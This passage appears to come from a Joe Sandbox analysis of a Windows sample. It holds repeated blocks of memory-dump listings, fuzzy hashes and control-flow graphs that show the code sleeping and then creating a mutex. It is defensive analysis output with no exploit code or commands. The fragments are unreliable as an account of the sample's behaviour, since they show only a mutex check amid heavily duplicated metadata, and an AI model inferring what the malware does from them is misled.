                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: T2l
                                                                                                                                                                                                        • API String ID: 1464230837-1031808636
                                                                                                                                                                                                        • Opcode ID: fd44f5cc379a0c27f7229ef07e3492262e2e9bb2fb964545f2a48120e5d8f995
                                                                                                                                                                                                        • Instruction ID: 46851c6ffc7d281fcf4b419647f11c28db45d30007fdc666e18f6d0c9c321eaf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd44f5cc379a0c27f7229ef07e3492262e2e9bb2fb964545f2a48120e5d8f995
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2312871A04200CBEB08DBB8DD89BACB763EFC5314F348658E415EB3D5C73599808B16

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 387 66a682-66a6a2 391 66a6a4-66a6b0 387->391 392 66a6d0-66a6ec 387->392 393 66a6c6-66a6cd call 67d663 391->393 394 66a6b2-66a6c0 391->394 395 66a6ee-66a6fa 392->395 396 66a71a-66a739 392->396 393->392 394->393 397 66a949 394->397 399 66a710-66a717 call 67d663 395->399 400 66a6fc-66a70a 395->400 401 66a767-66a916 call 6780c0 396->401 402 66a73b-66a747 396->402 405 66a94e 397->405 406 66a949 call 696c6a 397->406 399->396 400->397 400->399 408 66a75d-66a764 call 67d663 402->408 409 66a749-66a757 402->409 412 66a953-66a994 Sleep CreateMutexA 405->412 413 66a94e call 696c6a 405->413 406->405 408->401 409->397 409->408 419 66a996-66a998 412->419 420 66a9a7-66a9a8 412->420 413->412 419->420 421 66a99a-66a9a5 419->421 421->420
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 0066A963
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: T2l
                                                                                                                                                                                                        • API String ID: 1464230837-1031808636
                                                                                                                                                                                                        • Opcode ID: b95334d4e4bcc7e26e5448ba00ac90829d4ef19582a9baf7db23f0c3bfea0ef7
                                                                                                                                                                                                        • Instruction ID: 98dbb410505ff900e5c1da93d2220bd00287d603159df479a9fa97884dd292b0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b95334d4e4bcc7e26e5448ba00ac90829d4ef19582a9baf7db23f0c3bfea0ef7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD314871604200CBEB08DBB8DE89BADBB73EF81310F348658E414EB3D5D73599808B56

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 423 669adc-669ae8 424 669afe-669d91 call 67d663 call 677a00 call 665c10 call 668b30 call 678220 call 677a00 call 665c10 call 668b30 call 678220 423->424 425 669aea-669af8 423->425 425->424 426 66a917 425->426 428 66a953-66a994 Sleep CreateMutexA 426->428 429 66a917 call 696c6a 426->429 434 66a996-66a998 428->434 435 66a9a7-66a9a8 428->435 429->428 434->435 437 66a99a-66a9a5 434->437 437->435
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 0066A963
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: T2l
                                                                                                                                                                                                        • API String ID: 1464230837-1031808636
                                                                                                                                                                                                        • Opcode ID: e01c5edfcdd6b5147b15d37361e2f9081b91df026c63c643be51155ada126f8a
                                                                                                                                                                                                        • Instruction ID: 70e4c4239828f343c3e87fc7d39c052d45959f37c7107df95df1438979f61386
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e01c5edfcdd6b5147b15d37361e2f9081b91df026c63c643be51155ada126f8a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE213731614200DBEB189BA8ED89B6DB767EFC1310F20861DE908D73E9DB755A808B16

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 491 66a856-66a86e 492 66a870-66a87c 491->492 493 66a89c-66a89e 491->493 496 66a892-66a899 call 67d663 492->496 497 66a87e-66a88c 492->497 494 66a8a0-66a8a7 493->494 495 66a8a9-66a8b1 call 667d30 493->495 500 66a8eb-66a916 call 6780c0 494->500 507 66a8e4-66a8e6 495->507 508 66a8b3-66a8bb call 667d30 495->508 496->493 497->496 498 66a94e 497->498 505 66a953-66a987 Sleep CreateMutexA 498->505 506 66a94e call 696c6a 498->506 511 66a98e-66a994 505->511 506->505 507->500 508->507 516 66a8bd-66a8c5 call 667d30 508->516 512 66a996-66a998 511->512 513 66a9a7-66a9a8 511->513 512->513 515 66a99a-66a9a5 512->515 515->513 516->507 520 66a8c7-66a8cf call 667d30 516->520 520->507 523 66a8d1-66a8d9 call 667d30 520->523 523->507 526 66a8db-66a8e2 523->526 526->500
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 0066A963
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: T2l
                                                                                                                                                                                                        • API String ID: 1464230837-1031808636
